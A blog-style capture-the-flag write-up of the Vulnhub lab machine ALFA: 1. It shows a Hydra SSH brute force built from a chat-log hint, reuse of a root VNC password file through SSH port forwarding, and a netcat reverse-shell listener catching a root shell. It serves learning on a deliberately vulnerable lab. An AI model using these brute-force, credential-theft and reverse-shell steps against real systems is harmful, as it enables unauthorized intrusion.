This is ALFA: 1 from Vulnhub. It’s rated as Medium, and appears on the NetSecFocus Trophy Room list.

I had been doing the DriftingBlues series; I’d done 7 and 6 then the privesc on 5 was like super CTF-ish and I was like meh and then I started 4 and it was multiple base64 encoded strings and some nonsense I was like nah I’m done with this son. Anyway, Alfa.


This box has FTP, HTTP, SMB and SSH on a non-standard port.


We’ve got anonymous access and find a username; thomas. We get a picture of a dog, and we can’t put anything. Moving on.

Dog picture

I try exiftool and stegseek; nothing. The filename is milo.jpg.


In robots.txt we have this:


And most of these things don’t exist. At the very bottom, we have this:


And if you go here you can find out that points to /alfa-support.

If we go there, we get this:

◈Thomas:➤Hi! I am Thomas Miller, employee number 300197 ✔✔
◈Alfa IT Support:➤Good morning! nice to greet you Thomas, ¿How can help you? ✔✔
◈Thomas:➤I have a problem with my password, I partially forgot it, I only remember that it is the name of my pet followed by 3 numerical digits. Could you reset my password? ✔✔
◈Alfa IT Support:➤With pleasure Thomas, in a maximum of 24-48 hours you will receive an SMS on your corporate phone with your new temporary password, which you will have to change later. regards. ✔✔

Righto. So the name of the pet is milo (we assume) and the numbers are presumably between 100 and 999. I generate a wordlist with python and feed it to Hydra:

hydra -l thomas -P ./passwords ssh://

And we get a hit:



We can SSH in as thomas; now what? Linpeas shows:

root 486 0.0 3.2 128952 47808 ? S 11:31 0:00 /usr/bin/Xtigervnc :1 -desktop Alfa:1 (root) -auth /root/.Xauthority -geometry 1900x1200 -depth 24 -rfbwait 30000 -rfbauth /root/.vnc/passwd -rfbport 5901 -pn -localhost -SecurityTypes VncAuth

That’s Xtigervnc running as root. It’s on port 5901:

tcp 0 0* LISTEN -

In our home directory, we have:

4,0K -rwxrwxrwx 1 root root 16 dic 17 23:35 .remote_secret

Now I wasn’t familiar with any of this before, so this was a nice learning experience. I installed tigervnc-viewer on my Kali:

apt-cache search vncviewer

tigervnc-viewer - Virtual network computing client for X

apt install tigervnc-viewer

And set up an SSH port forward:

ssh -p 65111 -L 5901:localhost:5901 thomas@

Now; I was guessing the .remote_secret file (owned by root) was some sort of credentials, so I copied it over to my machine. I also ran vncpasswd on the server and checked that the created file (/home/thomas/.vnc/passwd) looked similar to the .remote_secret file; it did.

To start tigervnc-viewer from the command line with a specified password file we use this syntax:

└─# vncviewer -passwd .remote_secret 

TigerVNC Viewer 64-bit v1.11.0
Built on: 2021-03-22 21:21
Copyright (C) 1999-2020 TigerVNC Team and many others (see README.rst)
See for information on TigerVNC.

Tue May 11 06:00:50 2021
 DecodeManager: Detected 2 CPU core(s)
 DecodeManager: Creating 2 decoder thread(s)
 CConn:       Connected to host port 5901
 CConnection: Server supports RFB protocol version 3.8
 CConnection: Using RFB protocol version 3.8
 CConnection: Choosing security type VncAuth(2)
 CConn:       Using pixel format depth 24 (32bpp) little-endian rgb888
 CConnection: Enabling continuous updates

And separately, we get root in a TigerVNC session. Apparently I can’t copy and paste from there (grrr) so I’ll send myself a shell just to prove it really happened:

└─# nc -nvlp 1234 
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 34774
root@Alfa:~# id;hostname;date
uid=0(root) gid=0(root) grupos=0(root)
mar may 11 12:44:33 CEST 2021
root@Alfa:~# cat /root/root.txt
cat /root/root.txt

root_flag==>> QFqy4EUHwtu9rrrVe2T27we5W
# etc

Yeah you can probably copy and paste from there if you can be bothered to figure out how; I can’t. Anyway this was pretty good and I learned some stuff so yay!